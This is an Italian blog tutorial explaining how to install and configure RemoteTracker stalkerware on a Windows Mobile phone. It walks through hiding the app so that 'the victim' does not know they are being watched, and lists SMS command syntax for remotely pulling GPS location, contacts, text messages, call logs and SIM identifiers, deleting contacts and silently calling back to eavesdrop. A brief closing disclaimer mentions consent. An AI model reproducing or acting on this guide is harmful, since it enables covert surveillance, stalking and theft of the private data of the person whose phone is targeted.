Spiare un cellulare con il sistema operativo windows mobile è diventato semplice anche grazie ai numerosi software che sono disponibili in rete. Questi programmi una volta installati funzionano in modo invisibile e consentono di spiare il cellulare in cui vine installato.  Inoltre, inviando un sms con uno specifico comando è possibile ottenere informazioni come la posizione GPS, gli sms inviati o l’ elenco delle telefonate effettuate. Uno di questi software è RemoteTracker, programma gratuito in cui è possibile configurare anche la lingua italiana.

RemoteTraker è considerato un ottimo programma con diversi vantaggi. Consente di ricevere le informazioni anche via e-mail o su FTP e una volta attivato non sarà visibile nell’elenco delle applicazioni installate.

Installare e far funzionare il software e davvero molto semplice. Forse l’unico svantaggio è che il software va installato manualmente sul cellulare.

Ecco come installare e far funzionare il software:

1) Scaricare RemoteTracker da http://sourcefoge.net/projects/remotetracker/files/ . Specifichiamo che per funzionare è necessario avere la versione 3.5 del .NET Compact Framework scaricabile da www.microsoft.it . Dopo l’installazione del software necessario, andando su Programmi ssarà visibile un file  nominato Config come nell’esempio sottostante.

2)Anche la configurazione è a portata di tutti e le opzioni disponibili sono diverse. Prima di tutto impostiamo la lingua italiana seguendo questo percorso: Menu/Options/Languages e si seleziona Italiano. C’è anche la possibilità di controllare il programma in remoto  ma è necessario impostare la parola segreta in Password , il software garantisce l’accessibilità anche se si dimenticasse la password attraverso la domanda segreta per recuperarla. In Configurazione email si inserisce un indirizzo di posta elettronica cui inviare le informazioni. Ecco una foto di esempio delle impostazioni iniziali:

3)In Configurazione GPS si sceglie il tipo di GPS da utilizzare. In Nascondi RemoteTracker confermando con SI , l’applicazione rimarrà nascosta agli altri programmi. La vittima in questo modo non saprà di essere controllata. Specifichiamo che una volta attivata l’opzione non si potrà tornare indietro, come è possibile vedere nell’avviso.

4)Se il dispositivo da controllare non avesse il GPS non ci sarebbero problemi perchè grazie ad un’ altra opzione è possibile seguire gli spostamenti del cellulare. In CellID a Coordinate Provider consente di rilevare la posizione utilizzando la rete del cellulare, successivamete basta andare su Applica le configurazioni.

Adesso spieghiamo quali sono i comandi da utilizzare a distanza.

Prima di tutto si invia un sms con un comando come rt#[comando]#[numero di cellulare o indirizzo email]#[password] . La password è quella precedentemente impostata e il numero di cellulare o l’indirizzo email è quello in cui si vuole ricevere la risposta. Ecco l’elenco dei comandi e la spiegazione.

HELP – invia la lista dei comandi con un sms
CB – fa una chiamata ad un numero e lascia il telefono acceso (questo è utile per ascoltare la conversazione)
GP – avvia il GPS e invia le coordinate
PB – invia tutti i contatti presenti nella sim
GO – per ottenere le informazioni personali
RST – fa un softrest
ALARM – fa riprodurre un suono al telefono (utile quando non si sa dove lo si è lasciato)
GI – si ottiene l’ IMEI e il numero IMSI della SIM
ELT – serve a ottenere via e-mail il tracciato per visualizzarlo su Google Maps
EHELP – invia la liasta dei comandi via e-mail
EGP – invia le coordinate GPS via e-mail
EPB – invia i contatti via e-mail
EGO – per ottenere informazioni personali via email
EGI – si ottiene l’ IMEI e il numero IMSI della SIM via e-mail
DSC – cancella i contatti della sim
GANFL – invia le chiamate fatte e ricevute (richiede il programma VITO Audio Notes installato nel device)
CELLID – restituisce le informazioni dalla cella utilizzata dal telefonino.
CALLHIST – restituisce la liste delle chiamate effettuate. Di defoult si ricevono le ultime 5 chiamate. Ma si può definire un numero diverso con il comando: rt#callhist,[numero dele chiamate]## [password]
EGANFL
– invia per e-mail le chiamte fatte e ricevute (richiede il programma VITO Audio Notes intallato nel device)
ECELLID –  restituisce le informazioni dalla cella utilizzata dal telefonino via e-mail
ECALLHIST – restituisce la lista delle chiamate effettuate via e-mail
ESMS – invia un file zip via e-mail con tutti gli sms compresi numero e testo

Ricordia che l’utilizzo di questo software è cnsentito ma soltanto dietro l’autorizzazione del sorvegliato. Non ci assumiamo nessuna responsabilità nel caso in cui queste informazioni venissere utilizzate in modo non corretto e non legale.

Comments

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *